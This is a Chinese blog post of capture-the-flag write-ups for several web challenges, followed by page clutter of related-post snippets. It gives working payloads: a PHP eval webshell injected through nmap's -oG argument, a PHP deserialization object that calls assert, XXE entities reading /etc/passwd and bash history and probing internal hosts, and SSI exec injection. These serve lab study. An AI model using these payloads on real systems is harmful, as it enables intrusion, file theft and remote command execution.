2021-01-30

最新推荐文章于 2022-10-20 18:15:33 发布
最新推荐文章于 2022-10-20 18:15:33 发布
阅读量172 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113446693
版权
本文探讨了Web安全中的几个关键概念,包括使用Nmap进行网络扫描,如何利用XXE漏洞读取文件和探测内网,以及PHP的反序列化漏洞。通过实例展示了如何构造payload来绕过过滤并执行恶意代码。同时,提到了WordPress网站的潜在SWP泄露问题和SSI注入。
摘要由CSDN通过智能技术生成

[网鼎杯 2020 朱雀组]Nmap

考nmap的用法,但是我不会
用上次online tool的payload

?host=' <?php @eval($_POST["cmd"]);?> -oG yjh.php '

回显hacker
猜测是过滤了php

?host=' <?= @eval($_POST["cmd"]);?> -oG yjh.phtml '

在这里插入图片描述
这样可以蚁剑连,也可以post一个命令
在这里插入图片描述

https://www.bilibili.com/video/av795863875/

[MRCTF2020]PYWebsite

在这里插入图片描述
进去是这么个页面,在源码里面搜索php
搜到了flag.php
在这里插入图片描述
访问之后是这样
在这里插入图片描述
看起来要伪造ip,抓包xff试试
在这里插入图片描述

[NPUCTF2020]ReadlezPHP

在源码里面搜索php,搜到一个
在这里插入图片描述
访问后是源码

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);
  1. 诶好像是反序列化
  2. 看起来$b是函数名,$a是参数
  3. __destruct()   - 对象的所有引用都被删除或者当对象被显式销毁时执行,脚本运行结束前会调用析构函数
<?php
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "eval($_POST[cmd]);";
        $this->b = "assert";
   
}
}
$c = new HelloPhp();

echo urlencode(serialize($c));

?>

过滤了system,所以用assert
蚁剑连接后啥也没有

$this->a = "phpinfo()";

或者

post:cmd='phpinfo;'

应该也可以
payload

?data=O%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A9%3A%22phpinfo%28%29%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D

在这里插入图片描述

[NCTF2019]True XML cookbook

抓包,发现存在XXE漏洞
添加外部注入实体

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
  <username>&admin;</username>
  <password>password</password>
</user>

没有回显出flag
这里考的是XXE漏洞可以直接攻击内网用户

读取用户信息:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///etc/passwd">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

读取历史命令:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///www-data/.bash_history">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

查看内网存活主机:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///etc/hosts">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

在这里插入图片描述

找到一个主机,访问

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "http://173.10.47.10">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

没有flag
可以用bp爆存活主机
在这里插入图片描述

[BJDCTF2020]EasySearch

wp说是扫到了swp泄露,但是我没扫到

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

一开始还以为要用到随机数,看到后面才发现前面那一段都没有用,关键在

        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6))

这一个if
也就是一个字符串md5之后前六位为6d0bc1
由于本菜鸡不会python,所以借用网上的poc

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)
        print(a)

在这里插入图片描述

post:password=2020666

抓包
在这里插入图片描述
看wp之前我没找到
访问一下看看
在这里插入图片描述
在这里插入图片描述
SSI注入参考文献
在这里插入图片描述

<!--#exec cmd="ls ../"-->

注入点只能在username了,
在这里插入图片描述
在这里插入图片描述

<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2 "-->

在这里插入图片描述

切谁怕谁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
8-14刷题(php反序列化,Smarty ssti,json命令执行)
Realiy的博客
08-14 960
[NPUCTF2020]ReadlezPHP 找到time.php?source,打开的得到time.php的源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } publ
2021-03-30
viras的博客
03-31 371
集成学习-Task5使用sklearn构建完整的分类项目1.收集数据集并选择合适的特征2. 选择度量模型性能的指标:三级目录 使用sklearn构建完整的分类项目 1.收集数据集并选择合适的特征 选择具体的模型并进行训练 评估模型的性能并调参 2. 选择度量模型性能的指标: 度量分类模型的指标和回归的指标有很大的差异,首先是因为分类问题本身的因变量是离散变量,因此像定义回归的指标那样,单单衡量预测值和因变量的相似度可能行不通。其次,在分类任务中,我们对于每个类别犯错的代价不尽相同。那么怎么去评价分类模型
BUU_刷题之旅(One)
Lemon's blog
05-27 1034
前言: 水平不够,刷题来凑! [NPUCTF2020]ReadlezPHP ——反序列化、disable_functions的绕过、flag隐藏在phpinfo中 开始以为这一堆0101有什么线索,看了大半天也没找出来,抓包的时候发现 访问一下,发现是php代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $t
buuctf刷题9 (反序列化逃逸&shtml-SSI远程命令执行&idna与utf-8编码漏洞)
weixin_63231007的博客
10-20 1994
如果我们传入 _SESSION[imgflagphp]=1111 会发现 s:10:"img" 我们输入的flagphp被替换为了空,只剩下了img,这样就有反序列化逃逸那味了,逃逸了7个字符。序列化串为:a:4:{s:5:"phone";因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,所以要传_SESSION[img]=s:3:"img";看一下这个序列化串:a:2:{s:10:"img";s:3:"img";
[NPUCTF2020]ReadlezPHP 1
plant1234的博客
04-16 669
[NPUCTF2020]ReadlezPHP 1 首先打开题目,通过查看源码发现: 发现time.php页面访问得到: 请求source看看得到: 得到源码: <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "d
【BUUCTF】[BSidesCF 2019]Futurella
aoao331198的博客
05-19 456
检查 拿到代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ $a = $this->a;
2021-06-30
Y1271656307的博客
06-30 134
关于showModalDialog在Chrome中无效的解决方法,修改老版本系统的兼容性问题(改完之后IE就用不啦啦啦啦) 1.首先要引用个JS(某大神的) showModalDialog.js (function () { window.showModalDialog = window.showModalDialog || function (url, arg, opt) { url = url || ''; //URL of a dialog arg = arg
gtk2-runtime-2.24.33-2021-01-30-ts-win64.exe
07-14
gtk2-runtime-2.24.33-2021-01-30-ts-win64.exe
2021-01-30-alx-cpp
02-13
【标题】"2021-01-30-alx-cpp" 是一个与C++编程相关的项目或教程,可能是一个源代码仓库或者学习资料的集合。由于标题较为简洁,我们无法直接获取具体的技术细节,但可以推测这可能是某个人或团队在2021年1月30日时...
[HACK学习呀] - 2021-01-30 内网渗透|Chisel内网穿透工具1
08-03
一、chisel工具介绍 二、chisel工具下载使用 三、chisel隧道搭建
2021-kn-node-01-es6:2021-kn-node-01-es6
05-05
例如,对于数组`let [a, b, c] = [1, 2, 3]`,对于对象`let {name, age} = {name: 'John', age: 30}`。 4. **默认参数和剩余参数:** 函数参数可以设置默认值,如`function greet(name = 'World') {...}`。剩余...
Reactredux-ts
02-15
该项目是通过。可用脚本在项目目录中,可以运行:yarn start 在开发模式下运行应用程序。 打开在浏览器中查看。 如果进行编辑,页面将重新加载。 您还将在控制台中看到任何棉绒错误。yarn test 在交互式监视模式下...
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
12-14
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
美国新冠疫情数据2020-1至2021-12-01(天-周-月)
最新发布
04-15
01(天/周/月) 时间频率 年度 区域跨度 美国 大洲 国家名称 dateti me 累计确诊数量 累计治愈数量 累计死亡数量 北美洲 美国 2021/12/ 31 54148314 41455786 824030 北美洲 美国 2021 /12/30 53559908 41391655 ...
fortilogger_arbitrary_fileupload:CVE-2021-3378 | FortiLogger-未经身份验证的任意文件上传(Metasploit)
05-08
日期:30-01-2021 漏洞利用作者:Berkan Er 供应商主页: : 软件链接: : 版本:4.4.2.2 经过测试:Windows 10 Enterprise x64 CVE:2021-3378 披露日期:26-02-2021 该模块通过不安全的POST请求利用未经...
[NPUCTF2020]ReadlezPHP 看答案懂了
zxnimud5的专栏
09-12 525
看代码./time.php?source <?php #error_reporting(0); classHelloPhp { public$a; public$b; publicfunction__construct(){ $this->a="Y-m-dh:i:s"; $this->b="date"; } publicfunction__destruct(){ $a=$...
理解laravel---1.2 控制反转2
zhuxineli的专栏
06-12 1091
     在php运行时,扩展分析程序,导出或提出关于类、方法、属性、参数等的详细信息,包括注释。这种动态获取信息以及动态调用方法的功能称为反射API. <?php /** * @author zhuxinlei * @date 2020-06-12 * @desc 我是类A的注释 */ class A { //我是构造函数的注释 public function __construct(B $b) {
NPUCTF2020 ReadlezPHP
Tajang的大千世界
05-02 288
打开靶机,吓我一跳,你根本不知道大晚上刷题,看到这个网页内心是啥感觉 页面好像限制鼠标了,左点右点没东西。robots啥也没有,CTRL+U看源码 发现有./time.php?source,点进去看一下 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s";
App4UITestToolint-tests-Empty-TC-Add-Tools-2021-04-01T11-30-30.450Z:为工具链创建
04-01
【App4UITestToolint-tests-Empty-TC-Add-Tools-2021-04-01T11-30-30.450Z:为工具链创建】是一个针对UI自动化测试的工具,其核心目标是进行功能性的End-to-End(E2E)系统测试。这个工具的开发旨在确保应用程序在...
id uid exam_id start_time submit_time score 1 1001 9001 2021-09-01 09:01:01 2021-09-01 09:51:01 78 2 1001 9002 2021-09-01 09:01:01 2021-09-01 09:31:00 81 3 1002 9002 2021-09-01 12:01:01 2021-09-01 12:31:01 81 4 1003 9001 2021-09-01 19:01:01 2021-09-01 19:59:01 86 5 1003 9002 2021-09-01 12:01:01 2021-09-01 12:31:51 89 6 1004 9002 2021-09-01 19:01:01 2021-09-01 19:30:01 85 7 1005 9001 2021-09-01 12:01:01 2021-09-01 12:31:02 85 8 1006 9001 2021-09-07 10:01:01 2021-09-07 10:21:01 84 9 1003 9001 2021-09-08 12:01:01 2021-09-08 12:11:01 40 10 1003 9002 2021-09-01 14:01:01 (NULL) (NULL) 11 1005 9001 2021-09-01 14:01:01 (NULL) (NULL) 12 1003 9003 2021-09-08 15:01:01 (NULL) (NULL) sql求时间差
07-25
您可以使用 SQL 中的函数来计算时间差。假设您想要计算 start_time 和 submit_time 之间的时间差,可以使用以下语句: ```sql SELECT id, uid, exam_id, start_time, submit_time, score, EXTRACT(EPOCH FROM ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值